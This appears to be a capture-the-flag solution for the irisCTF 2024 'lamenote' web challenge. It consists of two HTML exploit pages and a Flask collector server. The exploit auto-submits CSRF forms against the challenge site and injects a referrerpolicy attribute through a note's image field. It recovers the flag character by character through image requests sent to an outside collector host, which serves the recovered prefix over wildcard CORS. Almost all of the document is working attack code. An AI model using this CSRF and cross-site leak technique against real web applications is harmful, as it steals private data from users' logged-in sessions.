irisCTF 2024 [lamenote]
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<title>Document</title> | |
</head> | |
<body> | |
<iframe id="stuff" frameborder="0"></iframe> | |
<script> | |
function makeid(length) {
  // Random alphanumeric string of `length` characters, used here only as a
  // unique-looking note title. Math.random() is not a CSPRNG, so this must
  // not be reused anywhere unpredictability matters. Non-positive or NaN
  // lengths yield ''.
  const alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
  const picks = [];
  for (let i = 0; i < length; i += 1) {
    picks.push(alphabet[Math.floor(Math.random() * alphabet.length)]);
  }
  return picks.join('');
}
// Collector origin that stores the leaked characters and serves the prefix
// recovered so far at /known (the collector answers with a wildcard CORS
// header so fetch() from this page can read that body).
let webhook = "https://nyxmare.world/";
// Origin of the target application; both values must keep their trailing '/'
// because paths are appended by plain string concatenation below.
let remote = "https://lamenote-web.chal.irisc.tf/";
// fetch status on mine | |
// create A-Z} iframe for csrf | |
// delete srcdoc, add src into /search?query=FLAG{A-Z} | |
// | |
// Promise that resolves (with undefined) after `ms` milliseconds.
const sleep = (ms) => new Promise((resolve) => {
  setTimeout(resolve, ms);
});
// Fetch the flag prefix recovered so far from the collector's /known route.
// Returns the response body as text (a cross-origin read, so it depends on
// the collector's permissive Access-Control-Allow-Origin header).
async function check_known() {
  const response = await fetch(`${webhook}known`);
  return response.text();
}
// One round of the prefix-recovery loop. It reads the prefix recovered so
// far from the collector and, for every candidate next character c:
//   1. loads a data: URL iframe holding an auto-submitting form that POSTs a
//      note (text = prefix + c, image URL pointing back at the collector
//      with the candidate in its query string) to `remote`/create;
//   2. after 1 s, repoints the same iframe at `remote`/search?query=prefix+c;
//   3. after 3 s more, sends a CHECK marker so the collector extends the
//      prefix, then reloads the page to start the next round.
// Which candidates actually get reported back depends on how the target
// renders search results and on the Referer the browser attaches to the
// image load; that part is not visible here. From the target's side, a CSRF
// token or SameSite cookies on /create and a strict Referrer-Policy would
// each break one step of this round.
async function main (){
// candidate alphabet for the next flag character; '}' terminates the flag
let charset = "abcdefghijklmnopqrstuvwxyz_}"
// mixes await with .then(); the callback receives r = text body of /known
await check_known().then(async function(r){
// prefix already closed with '}' -> nothing left to recover, end the round
if(r.endsWith("}")){ return 1; }
// for...in over a string yields index strings, so charset[_] is one char
for(let _ in charset){
// NOTE: assigned without let/const, so data_csrf is an implicit global
data_csrf = `data:text/html,
<html\x3e
<body\x3e
<form action="${remote}create" method="POST">
<input type="hidden" name="title" value="${makeid(32)}" />
<input type="hidden" name="text" value="${r+charset[_]}" />
<input type="hidden" name="image" value="${webhook}iterate?c=${r + charset[_]}&' referrerpolicy='unsafe-url" />
<input type="submit" value="Submit request" />
</form\x3e
<script\x3e
document.forms[0].submit();
</script\x3e
</body\x3e
</html\x3e`
console.log(r + charset[_])
// one iframe per candidate; '}' is mapped to '_' in the id, presumably so
// the querySelector call below needs no escaping
let iframeWrap = document.createElement('iframe')
iframeWrap.src = data_csrf
iframeWrap.id = "nyx_"+(charset[_]).replace("}", "_")
document.body.appendChild(iframeWrap)
}
// give the auto-submitted forms time to complete before reusing the iframes
await sleep(1*1000)
for(let _ in charset){
let iframeWrap = document.body.querySelector("#nyx_"+(charset[_]).replace("}", "_"))
// srcdoc is never set above, so this removal is a no-op in practice
iframeWrap.removeAttribute('srcdoc')
iframeWrap.src = remote + `search?query=${r + charset[_]}`
}
// wait for the search pages (and any loads they trigger) to reach /iterate
await sleep(3*1000)
// round marker: the collector picks the next character on CHECK
await fetch(webhook + `iterate?c=CHECK`)
location.reload()
})
}
// Start a round; main() ends with location.reload(), so the page keeps
// cycling until the prefix served by /known ends in '}'.
main()
</script> | |
</body> | |
</html> |
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<title>Document</title> | |
</head> | |
<body> | |
<!-- <iframe id="stuff" src="https://lamenote-web.chal.irisc.tf/search?query=" frameborder="0"></iframe> --> | |
<script> | |
// Promise that resolves (with undefined) after `ms` milliseconds. Unused in
// this page; kept for parity with the other page.
const sleep = (ms) => new Promise((resolve) => {
  setTimeout(resolve, ms);
});
// Launch the exploit page (/csrf, served by the collector) in a new window
// instead of the iframe variant that is left commented out above.
async function main() {
  window.open('/csrf');
}
// Runs once on page load; the returned promise is intentionally not awaited.
main()
</script> | |
</body> | |
</html> |
from flask import * | |
from urllib.parse import urlparse | |
from functools import wraps | |
import string | |
# Characters reported to /iterate during the current round; emptied on CHECK.
chars: list[str] = []
# Flag prefix recovered so far; /known serves it to the exploit page and
# /iterate extends it by one character per round.
known: str = "irisctf{please_no_more_unintended_bug"
app = Flask(__name__)
@app.after_request
def csp(response):
    """Attach a wildcard CORS header to every response.

    Despite the name, no Content-Security-Policy is set here; the handler only
    adds ``Access-Control-Allow-Origin: *`` so the exploit page, served from a
    different origin, can read the body of ``/known`` with fetch().
    """
    response.headers.set("Access-Control-Allow-Origin", "*")
    return response
@app.route("/")
def index():
    """Placeholder root page; nothing of the collector logic lives here."""
    return "idklol"
@app.route("/start_exp")
def exp():
    """Serve the launcher page (index.html), which opens /csrf in a new window."""
    return send_file("index.html")
@app.route("/csrf")
def csrf():
    """Serve the page that drives one recovery round (csrf.html)."""
    return send_file("csrf.html")
@app.route("/known")
def known_():
    """Return the flag prefix recovered so far (also echoed to stdout)."""
    current = known
    print(current)
    return current
def check_not_exists():
    """Extend ``known`` by one character and reset the per-round report list.

    Every value reported to ``/iterate`` during the round is removed from the
    candidate alphabet (a-z, ``_``, ``}``); the first candidate left over is
    appended to ``known``. Raises IndexError if every candidate was reported.
    Reads and rewrites the module globals ``chars`` and ``known``.
    """
    global chars, known
    remaining = [c for c in string.ascii_lowercase + "_}" if c not in chars]
    print(remaining)
    known += remaining[0]
    print(known)
    chars = []
@app.route("/iterate", methods=["GET", "OPTIONS"])
def home():
    """Record one leaked candidate (or a round marker) sent by the victim's browser.

    ``c`` carries the candidate with the known prefix prepended; the prefix is
    stripped before storing. Requests whose Referer points at a ``/note/``
    page are ignored. ``c=CHECK`` closes the round via check_not_exists();
    anything else is appended to the global ``chars``. Always answers with an
    empty body. The Referer check only works because the browser sends one at
    all; a strict Referrer-Policy on the target would remove that signal.
    """
    global chars
    referer = request.headers.get("Referer", "")
    print(referer)
    if "/note/" in referer:
        return ""
    char = request.args.get("c", "(empty)").replace(known, "")
    if char == "CHECK":
        check_not_exists()
        return ""
    if char == "(empty)":
        print("SOMETHING WENT WRONG")
        return ""
    print(chars)
    chars.append(char)
    return ""
# Listen on every interface, port 80, plain HTTP (no TLS) so the victim's
# browser can reach the callbacks above; binding port 80 typically needs
# elevated privileges.
app.run("0.0.0.0", 80)